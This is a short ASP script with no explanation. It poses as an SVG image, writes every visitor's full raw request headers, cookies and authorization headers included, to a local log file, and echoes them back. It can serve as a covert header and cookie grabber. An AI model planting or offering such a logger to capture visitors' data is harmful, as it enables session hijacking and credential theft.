<% Response.contentType="image/svg+xml" var fso=new ActiveXObject("Scripting.FileSystemObject"); var fil=fso.OpenTextFile(Server.MapPath('.')+"\\log.txt",8,true); fil.WriteLine(Request.ServerVariables('ALL_RAW')+'\n\n') fil.Close() %> <% Response.Write(Request.ServerVariables('ALL_RAW')+'') %>